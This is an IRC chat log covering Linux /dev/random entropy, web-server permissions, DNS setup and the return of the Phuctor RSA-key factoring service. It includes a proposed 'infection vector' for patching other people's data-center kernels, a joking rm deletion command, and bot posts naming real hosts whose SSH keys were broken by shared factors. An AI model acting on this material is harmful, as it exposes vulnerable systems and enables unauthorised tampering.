1804667;1524443988;mircea_popescu;why ? if it doesn't get juice it just blocks 1804668;1524443992;mircea_popescu;you're more than welcome to fix it. 1804669;1524444009;asciilifeform;which why? 1804670;1524444014;mircea_popescu;why handle anything. 1804671;1524444031;asciilifeform;because afaik shitkernel offers no deterministic way to fix 1804672;1524444044;asciilifeform;( if i'm wrong about this, folx, plox to write in ) 1804673;1524444049;mircea_popescu;doesn't have to. /dev/random is blocking. all it needs to do is block if it has no fg. 1804674;1524444058;asciilifeform;right but how does it know where is an fg. 1804675;1524444063;mircea_popescu;it does not care. 1804676;1524444077;asciilifeform;from where does it read ? 1804677;1524444096;mircea_popescu;from wherever we make the standard. usb i guess ? 1804678;1524444104;asciilifeform;right but where. 1804679;1524444133;mircea_popescu;what do you mean, where. 1804680;1524444134;asciilifeform;could implement module the obvious way : takes N args, each of which must at load time be a valid /dev/ttyxxxx 1804681;1524444141;mircea_popescu;yes. 1804682;1524444150;asciilifeform;but this is incompatible with, say, a trinque-style kernel, that dun support loadable modules at all 1804683;1524444163;mircea_popescu;well if the kernel can't be patched then a patch won't help. 1804684;1524444164;asciilifeform;( i have the rockchips currently with these ) 1804685;1524444187;asciilifeform;mircea_popescu: the current set of kernel modules, largely work in either 'module' or 'built-in' mode, depending on how compiled 1804686;1524444195;mircea_popescu;but the idea isn't for ~our~ kernels. the idea is to have an infection vector, that permafucks a linus-tso kernel into no longer working like a piece orf shit. 1804687;1524444197;asciilifeform;the scheme described above, would work only as a loadable mod. 1804688;1524444219;asciilifeform;plox to elaborate? 1804689;1524444238;mircea_popescu;i don't believe in this philosophy of "universal support". "break everything until it fully conforms to tmsr expectation" is entirely sufficient. 1804690;1524444240;asciilifeform;recall, linus's kernel has no notion of random, it implements '/dev/random' as yet another sort of faux device, via module 1804691;1524444260;asciilifeform;mircea_popescu: this sounds great and wholesome but still gotta decide exactly how to break and where. 1804692;1524444280;mircea_popescu;indeed. which is why i was encouraging mod6 to look into it. 1804693;1524444310;mircea_popescu;but let's delve into detail here : 1804694;1524444338;asciilifeform;i can describe some known dead ends. for instance, you definitely do not want to marry the thing to the pl2303. because 1) you have no way of knowing that every pl2303 on usb is an fg 2) not every fg user got a pl2303 , they get whatever cheapest chinese cable is at any given moment 3) for all i know, pl2303 will not be gettable next month, next yr etc 1804695;1524444374;mircea_popescu;so, tmsr-kernel, such as for instance the very tight musl stuff, or what cuntoo evnetually will become, is out of scope for this discussion. of course it should have native fg handling, and im sure it will. 1804696;1524444399;asciilifeform;my whole point was that there can be no such thing as 'native fg handling' on pc. there's always a piece of shit in the way, e.g. usb. 1804697;1524444405;mircea_popescu;neverthless, inca-kernel, be it "debian" or whatever it is, needs a way to be fucked such that it stops exposing any /dev/random AT ALL for as long as it is not exposing a fg random. 1804698;1524444414;asciilifeform;aaa 1804699;1524444417;asciilifeform;this is pretty easy. 1804700;1524444434;mircea_popescu;that's all that's contemplated here, all we really want from the rest of the shitpile is a very clear knob, which, when turned, makes everything stop working that doesn't work like we expect it to work. 1804701;1524444437;mircea_popescu;that's it and that's all. 1804702;1524444443;mircea_popescu;and let them pick the pieces. 1804703;1524444468;asciilifeform;trivially, the 'random.c' item linked earlier, simply cut it. 1804704;1524444480;mircea_popescu;so you can waltz into dc installed "linux", patch it, and it either has /dev/random perma-blocked or else fg-streaming. 1804705;1524444490;asciilifeform;( observe, linus hasn't really got a kernel, just a tall pile of items like the one linked ) 1804706;1524444493;mircea_popescu;asciilifeform, well, ideally patch random.c into a fg streamer. 1804707;1524444497;mircea_popescu;asciilifeform, quite. 1804708;1524444714;asciilifeform;incidentally , knob won't 'break errything that isn't proper', troo champions of idiocy like gpg , will chug along without a working /dev/random ( iirc -- silently ) 1804709;1524445207;mircea_popescu;yawell. 1804710;1524446161;*;asciilifeform puts the postgres docs down, drained for nao, goes back to bed, apparently did in fact pick up some sort of slow-burning infectious nasty on the return plane 1804711;1524447023;mod6;ugh. get some rest, Sir 1804712;1524451681;trinque;perhaps there's a yet more immediate route. /dev manager (eudev, w/e) is simply told to symlink /dev/random to the FG device. 1804713;1524453323;mircea_popescu;trinque, that does at least half the job -- will get some actual entropy in there, even if it doesn't prevent the dilution with cvasi-random crap 1804714;1524466473;lobbes;phew. I finally got logbot genesis up and inserting log lines into a database on my test machine. Hardest thing was figuring out the config knobs for postgres (and side-quests such as libuuid) 1804715;1524466493;lobbes;Once I migrate this to pizarro shell, I plan to harvest my notes for a detailed n00b guide on standing up a 'vanilla' logbot (with focus on operating out of /home for pizarro shellists) 1804716;1524466629;mircea_popescu;nice! 1804717;1524467442;lobbes;I appreciate the suggested course correction earlier mircea_popescu. Now, after a week or so of toiling, I come out of the experience with more knowledge about V, sbcl, and postgres instead of painfully acquired trivia about dead-end things such as 'tcl' or the not-long-for-this-world gribble 1804718;1524467460;mircea_popescu;word. 1804719;1524467711;mircea_popescu;diana_coman, ahh it's nice to be back to braiding cordage... 1804720;1524470251;ben_vulpes;mircea_popescu: ssh pubkey pls 1804721;1524470265;mircea_popescu;use diana_coman's. 1804722;1524470307;ben_vulpes;diana_coman: ssh pubkey pls 1804723;1524470613;mircea_popescu;you already set a server for her yes ? 1804724;1524470682;mircea_popescu;in other lulz : samuel l jackson is billed as "black guy" in http://trilema.com/2009/sea-of-love/ 1804725;1524470974;ben_vulpes;holy doodle i think that i do 1804726;1524470990;ben_vulpes;notes ftw 1804727;1524471073;mircea_popescu;the whole wot-isp thing is already paying off. 1804728;1524471080;mircea_popescu;this is what i fucking wanted from the get-go. 1804729;1524471091;mircea_popescu;https://www.youtube.com/watch?v=_T8PHEAHOBs 1804730;1524472528;ben_vulpes;diana_coman: http://p.bvulpes.com/pastes/rRa4q/?raw=true 1804731;1524472537;*;ben_vulpes bbl 1804732;1524472576;ben_vulpes;my body is reacting very poorly to spring this year 1804733;1524472873;diana_coman;ben_vulpes, ack & confirmed I'm in 1804734;1524473191;ave1;http://btcbase.org/log/2018-04-23#1804661, can confirm arrival last week, I unpacked it yesterday, all layers seem to have been intact / untampered with! 1804735;1524473191;a111;Logged on 2018-04-23 00:35 asciilifeform: ave1 didja get it ? 1804736;1524473197;mircea_popescu;ben_vulpes and it only goes downhill from here. 1804737;1524473206;mircea_popescu;nice ave1 ! 1804738;1524473310;mircea_popescu;ben_vulpes, send me invoice for rest of year for it too. 1804739;1524473358;mircea_popescu;incidentally, is your "standard" mpwp installation linkbroken by default ? 1804740;1524473362;diana_coman;ben_vulpes, I don't need the wp stuff; what do I need to do to nuke it ? 1804741;1524473399;mircea_popescu;rm -rs!! 1804742;1524473586;diana_coman;lol 1804743;1524474084;diana_coman;or uhm, ben_vulpes what's the link at which *my stuff* is served? 1804744;1524474349;mircea_popescu;diana_coman, this usually goes the other way around : he tells you a ns, and i set the domain to point to it. 1804745;1524474365;mircea_popescu;last time the process resembled pulling teeth, eventually ended up using qntra's ns. 1804746;1524474370;mircea_popescu;they still have to create a zone for you. 1804747;1524474401;diana_coman;I was hoping that part was already done :D 1804748;1524474408;diana_coman;since I did not get any ns anyway 1804749;1524474431;diana_coman;so basically now I can plonk all my stuff in there and ...wait 1804750;1524474500;mircea_popescu;just about. you should be able to use the old reference style though, http://ip/~username/ 1804751;1524474568;diana_coman;apparently not: "not found" 1804752;1524474600;diana_coman;I tried that first, earlier 1804753;1524474620;mircea_popescu;i dunno wtf defaults they use. 1804754;1524474623;diana_coman;hence my q to ben_vulpes as to what link I can use to see my stuff at all 1804755;1524474723;mircea_popescu;word. ima bbl. 1804756;1524493469;mod6;Mornin TMSR~ 1804757;1524493529;diana_coman;morning mod6 ! 1804758;1524493542;mircea_popescu;hola 1804759;1524493669;*;mod6 waves 1804760;1524493711;mod6;The weather has finally turned here! A few nice spring days we've had, after 6 months of winter. 1804761;1524494599;mircea_popescu;nice then huh 1804762;1524494773;mod6;Sure beats rolling blizzards, that's for sure. 1804763;1524495072;mod6;Ugh, this coffee is horribru. 1804764;1524495086;mod6;:D 1804765;1524495580;mircea_popescu;aww. 1804766;1524495597;mircea_popescu;life's too short for bad coffee. 1804767;1524496122;mod6;yeah, I could probably degrease my lawn-mower engine with this rot. 1804768;1524496531;mircea_popescu;why don't you come over ? i'll buy you a bag. 1804769;1524496796;mod6;That'd be wonderful. I'd like to give real coffee a-go. 1804770;1524496975;mod6;I saw on of your pictures (I think from a breakfast table), where it looked like there was a funnel/filter direct into the cup. 1804771;1524497060;mod6;*one 1804772;1524497161;mod6;http://trilema.com/wp-content/uploads/2018/04/iguana-1.jpg 1804773;1524497267;mod6;Looks amazing! 1804774;1524497768;mircea_popescu;yup. 1804775;1524497784;mircea_popescu;they do not give a flying fuck over here, use 1/4 lb of fresh ground coffee for one cup, throw it away. 1804776;1524497797;mod6;O.O 1804777;1524497797;mircea_popescu;it's like it grows on trees. 1804778;1524497801;mod6;lol 1804779;1524497811;mircea_popescu;mod6, i kid you not, that's what you saw there. 1804780;1524497835;mod6;Coffee opulence 1804781;1524498252;BingoBoingo;diana_coman: Do you need any DNS records other than one pointing to your slice? 1804782;1524498265;*;asciilifeform waves 1804783;1524498317;mod6;Morning asciilifeform, feeling any better? 1804784;1524498327;asciilifeform;sorta 1804785;1524498487;BingoBoingo;Are your parotids normal sized? 1804786;1524498547;asciilifeform;afaik 1804787;1524498708;BingoBoingo;Probably not mumps then 1804788;1524498770;mircea_popescu;BingoBoingo, yes lobbes needs logs.minigame.bz forwarded. 1804789;1524498873;BingoBoingo;lobbes: Where do you need logs.minigame.biz pointed? 1804790;1524498895;mircea_popescu;.bz 1804791;1524498980;BingoBoingo;ty 1804792;1524499025;lobbes;BingoBoingo: plox 1804793;1524499413;BingoBoingo;Aite, there is a zone on ns1.qntra.net and ns2.qntra.net for minigame.bz 1804794;1524501418;mircea_popescu;diana_coman, say when ready i'll make the switch. 1804795;1524502297;deedbot;http://thetarpit.org/posts/y04/070-bucharest-botanical-garden.html << The Tar Pit - Bucharest botanical garden in the spring, as viewed through a couple of camera lenses 1804796;1524502549;diana_coman;mircea_popescu, I've transfered the stuff to the folder from ben_vulpes said apache serves; but more than that I can't check/see 1804797;1524502564;mircea_popescu;aite let's see what happens if i plif the switch. 1804798;1524502715;mircea_popescu;ugh somehow i fucked this up 1804799;1524502721;mircea_popescu;BingoBoingo, it's .biz not .bz! sorry! 1804800;1524502737;BingoBoingo;Aite, one sec 1804801;1524502757;mircea_popescu;i have nfi how this is even fucking possible, but my dns zone is currently ns1 ns2.minigame.bz EXCEPT the domain is .biz 1804802;1524502779;mircea_popescu;holy shit what the fuck is going on here. 1804803;1524502953;mircea_popescu;oooh i see the problem. ok so, i owned both .biz and .bz, back when i used namecheap. i transferred the latter but not the former to namesilo back when all those shenanigans occured. so .bz item is captive in namecheap, Registry Expiry Date: 2019-07-01T16:40:17Z. but basically i'm letting it lapse ; so erryone will have to update to the .biz version and we can pretend this all never occured. 1804804;1524502984;mircea_popescu;so BingoBoingo use .biz plox ; lobbes you'll be logs.minigame.biz rather than logs.minigame.bz as before. sorry about that. 1804805;1524503037;BingoBoingo;Aite, good to go 1804806;1524503121;mircea_popescu;done here as well. 1804807;1524503482;ben_vulpes;diana_coman: server is configured to respond to minigame.bz, per ^^ will be updating to serve minigame.biz and www.minigame.biz 1804808;1524503515;*;ben_vulpes laboring under serious immune system load and cognitive deficit 1804809;1524503535;diana_coman;ben_vulpes, k 1804810;1524503972;ben_vulpes;diana_coman: everything in ~/www needs to be 0755, may i effect that for you? 1804811;1524504122;*;trinque suggests something like diana_coman:apache and 0750 1804812;1524504217;ben_vulpes;yeah? 1804813;1524504271;ben_vulpes;i'm all ears, i've erred to date on what i think is safer but i lack a model 1804814;1524504290;ben_vulpes;trinque: that makes total sense 1804815;1524504446;trinque;if you do chmod g+rX it'll make directories traversable, but not go around marking everything executable 1804816;1524504487;trinque;can then do something like find /path/to/www -iname '*.php' -exec chmod g+x {} \; 1804817;1524504511;ben_vulpes;right, neat 1804818;1524504676;diana_coman;ben_vulpes, yes, go ahead 1804819;1524504743;diana_coman;trinque's suggestions sounds good to me 1804820;1524504870;lobbes;Aite. I'll have to make some minor tweaks later to reflect the new domain extension. Will let you know once logz are back in business >> http://btcbase.org/log/2018-04-23#1804804 1804821;1524504870;a111;Logged on 2018-04-23 17:03 mircea_popescu: so BingoBoingo use .biz plox ; lobbes you'll be logs.minigame.biz rather than logs.minigame.bz as before. sorry about that. 1804822;1524505031;ben_vulpes;diana_coman: website appears up to me, although that may just be /etc/hosts, i'm not up to speed on dns propagation yet 1804823;1524505269;diana_coman;I can't yet see it from here - will give it some time and check again later 1804824;1524505354;ben_vulpes;yup, just checked without local routing and no resolution. 1804825;1524505393;diana_coman;btw thanks BingoBoingo 1804826;1524505571;BingoBoingo;diana_coman: No problem at all 1804827;1524508207;deedbot;http://qntra.net/2018/04/cisco-products-hit-with-vulnerability-in-firms-security-markup-language/ << Qntra - Cisco Products Hit With Vulnerability In Firm's "Security Markup Language" 1804828;1524509278;asciilifeform;BingoBoingo: http://p.bvulpes.com/pastes/GzCyC/?raw=true 1804829;1524509783;BingoBoingo;asciilifeform: ack 1804830;1524509792;asciilifeform;BingoBoingo: ty 1804831;1524509811;BingoBoingo;no, ty 1804832;1524510615;mircea_popescu;http://btcbase.org/log/2018-04-23#1804815 << in this particular case it's nothing but a filestore, mostly for things like ... o hey look lobbes , eulora log no-go. 1804833;1524510615;a111;Logged on 2018-04-23 17:27 trinque: if you do chmod g+rX it'll make directories traversable, but not go around marking everything executable 1804834;1524510621;mircea_popescu;annnd no, minigame.biz does not resolve. BingoBoingo ben_vulpes ^ 1804835;1524510629;mircea_popescu;you really need this to work easier than multi-day multi-attempt sorta thing. 1804836;1524510631;mircea_popescu;"Begin testing delegation for minigame.biz. Name servers listed at parent: ns1.qntra.net,ns2.qntra.net Failed to find name servers of minigame.biz/IN. No name servers found at child." < 1804837;1524513209;BingoBoingo;My bad, I forgot a line break answers now http://p.bvulpes.com/pastes/ME8bh/?raw=true 1804838;1524513264;mircea_popescu;therew we go, foncirned. 1804839;1524513314;mircea_popescu;shit internal references broken also. diana_coman when you have a moment run a sed /minigame.bz/minigame.biz/ plox. 1804840;1524515440;diana_coman;ugh mircea_popescu I changed to minigame.biz and now the ownership of the files reverted to me and therefore index.html not available and it's again screwed; ben_vulpes ? 1804841;1524515553;diana_coman;gah, I meant: permissions got screwed, not ownership 1804842;1524515808;diana_coman;I'm not sure how this will work if groupownership of file changes from apache to my user every time I modify a file 1804843;1524515977;diana_coman;files created in the ~/www dir should default /inherit apache group 1804844;1524515987;mircea_popescu;diana_coman, you can just chown yourself neh 1804845;1524515999;mircea_popescu;chown -r diana:apache or w/e 1804846;1524516002;diana_coman;mircea_popescu, I need to change the *group* 1804847;1524516015;mircea_popescu;was it apache:diana ?! 1804848;1524516033;diana_coman;no,I need to change from diana:diana to diana:apache 1804849;1524516037;diana_coman;hm 1804850;1524516038;mircea_popescu;so do that. 1804851;1524516079;mircea_popescu;but i'll admit this sounds somewhat awkward. 1804852;1524516109;diana_coman;iirc that required root rights but will try 1804853;1524516207;diana_coman;myah, operation not permitted 1804854;1524516227;diana_coman;ben_vulpes, plox fix ^ 1804855;1524516254;mircea_popescu;well wait a second, wtf fix is this, "you can either edit your files or have them served by apache but not both" ?! 1804856;1524518108;diana_coman;since it seems the fix to the fix is another wait, I'll set for now 755 on the files as otherwise ckang still won't be able to get the client and try the game 1804857;1524518235;ben_vulpes;$user:$user and 0755 is what's been most useful on other sites; i think that'd be best here as well 1804858;1524518257;diana_coman;why exactly? 1804859;1524518287;diana_coman;I think trinque's suggestion makes perfect sense, as long as new files get by default user:apache too 1804860;1524518394;ben_vulpes;ok i'll look into how to make new files inherit from parent dirs 1804861;1524518509;spyked;TIL: setgid (g+s) should do the trick. 1804862;1524518589;mircea_popescu;fwiw, all trilema.com files are trilema:trilema and somehow(tm) work. 1804863;1524518874;ben_vulpes;spyked: thx, now to figure out what needs installing from portage to get setgid 1804864;1524518941;ben_vulpes;ah i think i see how to get it with chmod 1804865;1524519026;asciilifeform;mircea_popescu: is there a working mpex url ? i am standing snsa www / phuctor up today 1804866;1524519032;asciilifeform;and the old one (.biz) dunwork 1804867;1524519042;mircea_popescu;nope not yet. 1804868;1524519050;mircea_popescu;but will be same one, so don't worry about it. 1804869;1524519054;asciilifeform;ok ty 1804870;1524519090;ben_vulpes;okay, gotit. diana_coman i'm going to run chmod -R g+srX your www dir 1804871;1524519100;diana_coman;ben_vulpes, ok 1804872;1524519130;ben_vulpes;please confirm that new files show up as diana_coman:apache 1804873;1524519320;diana_coman;ben_vulpes, new files show up as diana_coman:apache BUT apparently still not with the right permissions to get served 1804874;1524519420;diana_coman;at least I can change the permissions though to what they need 1804875;1524519526;ben_vulpes;well that's still not great; they're not inheriting from the parent directory? 1804876;1524519597;diana_coman;the file inherited the group ownership but not the group permissions from what I can tell 1804877;1524519611;trinque;eh actually there were cobwebs between my ears when I gave that suggestion 1804878;1524519620;ben_vulpes;i suppose they wouldn't, that being controlled by umask 1804879;1524519620;trinque;probably easier move is to just add apache to the diana group 1804880;1524519623;diana_coman;i.e. new file had r and write for user but nothing for group 1804881;1524519658;ben_vulpes;diana_coman: yeah i think that comes from the user-level umask, which as i understand it sets permissions on individual files on create 1804882;1524520210;deedbot;http://www.loper-os.org/?p=2277 << Loper OS - The Return of Phuctor! 1804883;1524520273;asciilifeform;snsa www also updated. 1804884;1524520310;asciilifeform;folx with snsa links to archive.is -- feel free to switch back to the realthing. 1804885;1524520496;BingoBoingo;asciilifeform diana_coman Congrats 1804886;1524520503;asciilifeform;ty BingoBoingo 1804887;1524520563;asciilifeform;nao with ~100x faster db 1804888;1524520580;asciilifeform;( combo of ssd and various postgresisms ) 1804889;1524520619;ben_vulpes;i am interested in the postgrestisms you used 1804890;1524520642;ben_vulpes;ah i actually had a conversation with a little lady about the 'dirty read' thing last night 1804891;1524520651;asciilifeform;ben_vulpes: wouldja believe, nothing exotic 1804892;1524520655;asciilifeform;... indices. 1804893;1524520660;asciilifeform;i had nfi they existed. 1804894;1524520665;ben_vulpes;asciilifeform: lolk 1804895;1524520700;asciilifeform;book-larnin'(tm)(r) 1804896;1524520738;ben_vulpes;megawatt of iron or two indices hue 1804897;1524520770;asciilifeform;i didn't go to no db school, lel, ben_vulpes 1804898;1524520800;asciilifeform;at any rate -- it worx. 1804899;1524520809;*;trinque chortles 1804900;1524520822;asciilifeform;chortle, it's fair. 1804901;1524520844;trinque;naw, congrats on phuctor's rebirth! 1804902;1524520849;asciilifeform;ty trinque ! 1804903;1524520864;asciilifeform;trinque: lemme know when you've added the rss back in; i'ma start up the werker later tonight 1804904;1524520893;*;asciilifeform bbl, meat 1804905;1524521033;mircea_popescu;asciilifeform, o hey! 1804906;1524521033;*;ben_vulpes only ever attended cs program of hard knocks 1804907;1524521074;mircea_popescu;http://phuctor.nosuchlabs.com/ << sweet. 1804908;1524521085;mircea_popescu;now let's test the keys of folk who showed up in the meanwhile huh. 1804909;1524521087;diana_coman;ben_vulpes, trinque this is just too brittle : how about moving dirs/files in there? 1804910;1524521099;trinque;did ya see my last? 1804911;1524521102;diana_coman;so I guess it'll have to be 755 1804912;1524521122;mircea_popescu;!!key zx2c4 1804913;1524521123;deedbot;http://wot.deedbot.org/AB9942E6D4A4CFC3412620A749FC7012A5DE03AE.asc 1804914;1524521153;mircea_popescu;http://phuctor.nosuchlabs.com/gpgkey/8EEE946DA699B07DBC900780CEAF6AF1D30A962583586D3372E6C0C30688846C << ha-HA! 1804915;1524521280;ben_vulpes;diana_coman: shall i add apache to the diana_coman group before you 755 up? 1804916;1524521346;*;ben_vulpes sitting for remedial unix permissionsology at SOHN this afternoon 1804917;1524521377;mircea_popescu;asciilifeform> i had nfi they existed. << well they were mentioned duyring the 3-4 optimization threads about 3-5x each time, but... 1804918;1524521567;asciilifeform;mircea_popescu: funnily enuff still, i laboured under the misconceived notion that they existed ~by default~ 1804919;1524521583;mircea_popescu;do what indices i mean! 1804920;1524521589;asciilifeform;didn't occur to me for even a moment that it doesn't make a btree for all params!! 1804921;1524521592;asciilifeform;believe or not 1804922;1524521598;asciilifeform;had to read the fucking docs, to learn this. 1804923;1524521612;mircea_popescu;anuyway, i can see the angle ; but it's one of those cases where ai is much cheaper than just letting the person make the settings. 1804924;1524521623;mircea_popescu;they take space, see ? lots of space. 1804925;1524521630;ben_vulpes;\dt woulda shown you indices on the table too asciilifeform 1804926;1524521636;mircea_popescu;some of my heavy hit tables are 60% indexes by weight. 1804927;1524521660;asciilifeform;mircea_popescu: i also laboured under the notion that the thing 1) auto-indexed 2) to fill available space 1804928;1524521672;mircea_popescu;yawell. different decade. 1804929;1524521676;asciilifeform;(2) was suggested by all of the various lit suggesting 'expand room given for indices' 1804930;1524521677;diana_coman;ben_vulpes, no, enough experimenting I'd say 1804931;1524521695;ben_vulpes;thanks for your patience diana_coman 1804932;1524521709;asciilifeform;ok i'ma genuinely bbl 1804933;1524528366;mod6;danielpbarron: got it! Thanks for the t-shirt too. Fits good. 1804934;1524528419;asciilifeform;http://phuctor.nosuchlabs.com/faq << 'credits' links, being old deceased btcalpha links, fixed , replaced with modern wot.deedbot 1804935;1524528432;asciilifeform;if anybody spots other dead linx -- plox to write in. 1804936;1524528535;ben_vulpes;sweet, asciilifeform ! 1804937;1524528651;asciilifeform;hanbot: in http://thewhet.net/2018/04/mp-wp-genesis some of the linx are broken ( have mysterious chars in'em ) 1804938;1524528672;ben_vulpes;fg is a nice addition 1804939;1524528865;asciilifeform;danielpbarron: my link to http://danielpbarron.com/2017/fucking-goats/ is a 404... 1804940;1524528881;asciilifeform;danielpbarron: is it coming back, or should i remove it on my side 1804941;1524528904;hanbot;ty asciilifeform, fixt. 1804942;1524529735;asciilifeform;!Q later tell BingoBoingo http://p.bvulpes.com/pastes/q1izn/?raw=true 1804943;1524529736;lobbesbot;asciilifeform: The operation succeeded. 1804944;1524530424;asciilifeform;!!subscribe http://phuctor.nosuchlabs.com/rss 1804945;1524530425;deedbot;asciilifeform subscription to http://phuctor.nosuchlabs.com/rss failed 1804946;1524530433;asciilifeform;hmm is this meant to work ? trinque ? ^ 1804947;1524531774;asciilifeform;... meanwhile i've resumed feeding the thing. we're on parcel #8 of the Framedragger set ( of a total of 13 ) . 1804948;1524531797;asciilifeform;after these get eaten, prolly will be ripe for a refresh of sks 1804949;1524531800;mircea_popescu;z 1804950;1524531801;asciilifeform;( we last did sks in 2016 ) 1804951;1524531807;mircea_popescu;asciilifeform, iirc he said he does it by hand 1804952;1524531811;asciilifeform;aaaa 1804953;1524531828;asciilifeform;ok, will then have to wait for trinque to wake up, then will reactivate werker 1804954;1524532497;*;asciilifeform wonders who the regular l0gz reader in the darkest africa of the inside washington dc city walls is... phf ? 1804955;1524532590;phf;asciilifeform: if something hit your phuctor logs from dc just now, that would be me, yes 1804956;1524532595;asciilifeform;lolk 1804957;1524535829;trinque;asciilifeform: I added it; fire away 1804958;1524535859;trinque;the !!subscribe lever is detached, yes, since it used to run back to a pretty sad pile of duct tape. 1804959;1524538370;*;trinque understands spyked to be working on a superior rsstron 1804960;1524541575;asciilifeform;trinque: ty; activated. 1804961;1524542442;danielpbarron;asciilifeform, http://danielpbarron.com/2017/fucking-goats/ << ported it over from old www 1804962;1524542483;asciilifeform;danielpbarron: yay! worx 1804963;1524542486;danielpbarron;interestingly, i set the publish date to 2017 june, and mp-wp did exactly what i hoped 1804964;1524542492;asciilifeform;neato. 1804965;1524542529;asciilifeform;meanwhile in brokenlinx, mircea_popescu , http://trilema.com/2015/on-how-the-factored-4096-rsa-keys-story-was-handled-and-what-it-means-to-you/ << contains btcalpha linx 1804966;1524542952;mircea_popescu;yeah. 1804967;1524543037;mircea_popescu;vaguely hoping dood shows, but enough's enough. contains no more. 1804968;1524543076;asciilifeform;which shows ? mike_c ? 1804969;1524543102;mircea_popescu;ya 1804970;1524543102;asciilifeform;if so -- i'd be surprised, tbh. 1804971;1524543124;mircea_popescu;myeah. 1804972;1524543131;asciilifeform;went to the bottom of the sea, approx. 1804973;1524543139;asciilifeform;RIP. 1804974;1524546496;deedbot;http://phuctor.nosuchlabs.com/gpgkey/185DBF5D4298D675A8FC76103F0C8BCD4245E87E1E1FB0238D2D2D24378B73B9 << Recent Phuctorings. - Phuctored: 2398...0967 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (70-100-42-43.br1.sho.az.frontiernet.net. US AZ) 1804975;1524546496;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C300E7F53E93306CE671E9C2BEE2440C21AE8142202BD8E090FFA40BFF361FDA << Recent Phuctorings. - Phuctored: 2358...5309 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (ec2-50-16-76-136.compute-1.amazonaws.com. US VA) 1804976;1524546496;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8879099959542C3CC6F18FF65447FF7710799C7DF909E58A99D9AD0F06D156FB << Recent Phuctorings. - Phuctored: 2165...6791 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE) 1804977;1524546496;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8844F6A2F2BDAC790E9EB53B7E7D7FFDC1BBFB176B97D45FB6C6810C18D16D63 << Recent Phuctorings. - Phuctored: 2165...6791 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE) 1804978;1524546496;deedbot;http://phuctor.nosuchlabs.com/gpgkey/721368F7F97054DD97B530A9375BEDDD87132F4C0BEFA7B4830713CA3F280412 << Recent Phuctorings. - Phuctored: 2165...6791 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE) 1804979;1524546497;deedbot;http://phuctor.nosuchlabs.com/gpgkey/E906CCADD206429754D318A2DBF2150F1DB8E4A961C2EB92E0DA3910933A9A60 << Recent Phuctorings. - Phuctored: 2374...4793 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (200-127-145-2.net.prima.net.ar. AR C) 1804980;1524546497;deedbot;http://phuctor.nosuchlabs.com/gpgkey/B86CE795F2C161873F7483262B7209732A948AB7E85633A4EF21E3F45003F62C << Recent Phuctorings. - Phuctored: 2523...3319 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (a152.reverse.yawsp.de. DE) 1804981;1524546498;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C040E99F60AE8FC1E763BC8B8D33DC01E753FB561BA9D9E34DA99C36F862780D << Recent Phuctorings. - Phuctored: 2948...6433 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (ns2.km22419-03.keymachine.de. DE) 1804982;1524546498;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F61096A0AB7490E19DF4BDCE502A2284E275036A7A4AFB0E1501C361B73AEDEC << Recent Phuctorings. - Phuctored: 2948...6433 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' ( US OH) 1804983;1524546499;deedbot;http://phuctor.nosuchlabs.com/gpgkey/A4446E29F632C1BB97B84C66F1A6565BFC1A865B4D6B1B8FBC3417E3D1AAE353 << Recent Phuctorings. - Phuctored: 2172...3051 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (re2.corded.org. FI) 1804984;1524546499;deedbot;http://phuctor.nosuchlabs.com/gpgkey/2DF7A3702116E0E30B47DFE5B6E3E9893FF8379DFD4DC6734620CDF4083DB555 << Recent Phuctorings. - Phuctored: 1366...7431 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (cpe-66-8-171-191.hawaii.res.rr.com. US HI) 1804985;1524546500;deedbot;http://phuctor.nosuchlabs.com/gpgkey/9B2B6BCD108A73255D7C96C56F4D05290FDCF0D4EB76182146B86644232D3EE8 << Recent Phuctorings. - Phuctored: 2444...1059 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (poseidon.zonemail.co.za. US NJ) 1804986;1524546500;deedbot;http://phuctor.nosuchlabs.com/gpgkey/73F5B65045D18FE5164134652EAC7E16FF08864E46B284D382356BBFBF2E22F6 << Recent Phuctorings. - Phuctored: 2443...0861 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (clearwall.com. US NY) 1804987;1524546698;mircea_popescu;ohoho 1804988;1524546720;mircea_popescu;I THINK IT HAS THE POWER 1804989;1524546875;mod6;woah 